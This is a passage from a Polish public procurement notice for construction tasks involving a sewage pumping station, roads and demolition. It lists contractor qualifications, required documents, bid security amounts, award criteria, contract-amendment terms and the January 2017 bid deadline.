Posiada doświadczenie w pełnieniu funkcji kierownika robót elektrycznych i AKPiA w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jedną inwestycję obejmującą budowę sieci kabli zewnętrznych, instalacji technologicznych wewnętrznych lub zewnętrznych, automatyki i układów AKPiA podczas budowy lub/i modernizacji lub/i rozbudowy lub/i przebudowy pompowni ścieków o przepustowości co najmniej 50 l/s.
d)	Kierownikiem robót drogowych, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika robót branży drogowej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jednej inwestycji obejmującej rozbudowę lub/i przebudowę lub/i  budowę drogi o wartości nie mniejszej niż 100 000,00 zł każda.
3)	ZADANIE III:
a)	Kierownikiem budowy, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno  budowlanej bez ograniczeń, wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót branży konstrukcyjno-budowlanej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jednej inwestycji obejmującej rozbiórkę obiektu budowlanego o kubaturze nie mniejszej niż 500 m3, przy czym roboty muszą polegać na rozbiórce obiektów inżynieryjnych.
b)	Kierownikiem robót sanitarnych, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika branży sanitarnej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jedną inwestycję obejmującą rozbiórkę obiektu budowlanego o kubaturze nie mniejszej niż 500 m3, przy czym roboty muszą polegać na rozbiórce obiektów inżynieryjnych.
c)	Kierownikiem robót elektrycznych, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika robót elektrycznych i AKPiA w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jedną inwestycję obejmującą rozbiórkę obiektu budowlanego o kubaturze nie mniejszej niż 500 m3, przy czym roboty muszą polegać na rozbiórce obiektów inżynieryjnych.
d)	Kierownikiem robót drogowych, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy).

3.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"> 
1.	Informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 
2.	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
3.	 zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem termin składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
4.	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp; 
5.	oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
6.	oświadczenie Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; 
7.	oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716 ze zm.); 
8.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa: 
1)	w punkcie 1 powyżej, składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	w punktach 2-4 powyżej  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, - dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
b)	nie otwarto jego likwidacji ani nie ogłoszono upadłości. Nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykonawca na wezwanie Zamawiającego przekaże: 
a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju (o których mowa w niniejszym ogłoszeniu w części dotyczącej zdolności technicznej lub zawodowej), wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.  Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty;
b)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
c)	informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert; 
d)	poświadczony za zgodność z oryginałem dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wskazaną przez Zamawiającego w w/w punkcie sumę gwarancyjną.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Pełnomocnictwo w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez Wykonawców działających wspólnie, zgodnie z art. 23 ustawy Pzp. Pełnomocnictwo powinno być załączone w oryginale lub kopii notarialnie potwierdzonej.
2.	Dowód wniesienia wadium.
3.	Harmonogram rzeczowo-finansowy 
4.	Zaparafowany wzór umowy 
5.	Tabela elementów użytych do realizacji przedmiotu zamówienia 
6.	Zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia w przypadku gdy Wykonawca polega na zdolnościach innych podmiotów.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający wymaga wniesienia wadium 
na ZADANIE I: w wysokości 200.000 zł (słownie: dwieście tysięcy złotych),
na ZADANIE  II:  w wysokości  100.000 zł (słownie: sto tysięcy złotych),
na ZADANIE III:  w wysokości  300.000 zł (słownie: trzysta tysięcy złotych),
1.	Wadium może być wniesione w jednej lub kilku następujących formach:
a) 	w pieniądzu,
b) 	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) 	w gwarancjach bankowych,
d) 	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359 z późn. zm.).
2.	Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego, numer konta 41102013320000110202168037 przed upływem terminu składania ofert. W tytule przelewu należy wpisać nr postępowania tj.: ZP/JRP/O/2016. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
3.	Jeżeli wadium przetargowe zastaje wnoszone w innej formie niż w pieniądzu, kopie dokumentów stwierdzających wniesienie wadium winne zostać dołączone do składanej oferty, natomiast oryginał złożony oddzielnie w opieczętowanej przez Wykonawcę kopercie z napisem WADIUM w siedzibie Zamawiającego.
4.	Dokument wadialny powinien mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>zadanie I: cena ofertowa</td><td>60</td></tr><tr><td>zadanie I: okres udzielonej gwarancji jakości</td><td>20</td></tr><tr><td>zadanie I: czas reakcji serwisu gwarancyjnego</td><td>20</td></tr><tr><td>zadanie II: cena ofertowa</td><td>60</td></tr><tr><td>zadanie II: czas reakcji serwisu gwarancyjnego</td><td>30</td></tr><tr><td>zadanie II: okres udzielonej gwarancji jakości</td><td>10</td></tr><tr><td>zadanie III: cena ofertowa</td><td>60</td></tr><tr><td>zadanie III: okres udzielonej gwarancji jakości</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający na podstawie art. 144 ust. 1 pkt 1 ustawy Pzp przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku zaistnienia co najmniej jednej z następujących okoliczności: 

1) zmiany wysokości wynagrodzenia Wykonawcy, w przypadku zmiany: 
a)	stawki podatku od towarów i usług - o wartości tej stawki,
b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz.U. z 2015r. poz 2008 ze zm.)  o wartość stanowiącą różnicę pomiędzy stawką przed zmianą, a stawką po zmianie, (zmiana wysokości wynagrodzenia dotyczy personelu bezpośrednio realizującego przedmiot zamówienia).
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. 

2) zmiany terminu wykonania umowy w przypadku: 
a)	wystąpienia okoliczności niezależnych od Wykonawcy (m.in. w szczególności opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność), 
b)	napotkania niezinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych, 
c)	wystąpienia przerw w realizacji robót budowlanych, powstałych z przyczyn zależnych od Zamawiającego, 
d)	wystąpienia okoliczności wynikających z działania siły wyższej (przez którą rozumie się wydarzenia, które w chwili podpisania umowy nie mogły być przez Strony przewidziane i zostały spowodowane przez okoliczności od nich niezależne takie jak wojna, pożar, wiatrołomy, susza, powódź, inne naturalne klęski, restrykcje lub prawne rozporządzenia, rządu, strajki itp.) lub warunków atmosferycznych odbiegających od typowych, 
e)	jeśli w wyniku prowadzonych prac archeologicznych wystąpią opóźnienia w robotach budowlanych, a tym samym w usłudze nadzoru inwestorskiego, 
f)	zlecenia robót zamiennych, jeżeli terminy ich zlecenia, rodzaj lub zakres,
g)	zmiany/wprowadzenia podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji Zamawiającego;
- skutkujących niemożliwością dotrzymania terminu zakończenia realizacji robót budowlanych, a tym samym terminu wynikającego z umowy, dopuszcza się możliwość wydłużenia terminu realizacji umowy, nie więcej jednak niż o czas trwania tych okoliczności,

3) zmiany Wykonawcy w przypadku:
a)	zgonu lub ogłoszenia likwidacji Wykonawcy.

2.	Wykonawca może wystąpić do Zamawiającego o wydłużenie terminu wykonywania  robót    
budowlanych wynikłych z przyczyn od niego niezależnych, nie więcej jednak niż o czas trwania    tych robót lub okoliczności. Zmianę terminu realizacji zamówienia ustala i zatwierdza Zamawiający. Wykonawca nie może dochodzić roszczeń z tytułu zmiany terminu realizacji zamówienia. 

3.	Poza sytuacjami wskazanymi w pkt. powyżej, zmiana postanowień umowy może nastąpić zgodnie z  art. 144 ust. 1 pkt 2 ustawy Pzp, w następujących przypadkach 

1)	gdy zmiany dotyczą realizacji dodatkowych robót budowlanych od dotychczasowego Wykonawcy nieobjętych zawartą umową, o ile takie roboty budowlane staną się niezbędne do należytego wykonania umowy i zostaną spełnione łącznie następujące warunki: 
a)	zmiana umowy w zakresie Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego,
b)	 zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego, 
c)	wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej w zawartej umowie na roboty budowlane. 
2)	zostaną spełnione łącznie następujące warunki: 
a)	konieczność zmiany umowy z Wykonawcą spowodowana będzie okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć przed jej zawarciem,
b)	wartość zmiany nie przekracza 50% wartości zamówienia określonej w zawartej umowie na roboty budowlane.
3)	 Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca: 
a)	w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca będzie spełniał warunki udziału w niniejszym postępowaniu, nie zajdą wobec niego podstawy wykluczenia oraz nie pociągnie to za sobą innych istotnych zmian umowy, 
b)	w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego podwykonawców. 
4.	Ponadto, zmiany, niezależnie od ich charakteru, są możliwe, gdy nie są istotne w rozumieniu art. 144 ust. 1e ustawy Pzp. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/01/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
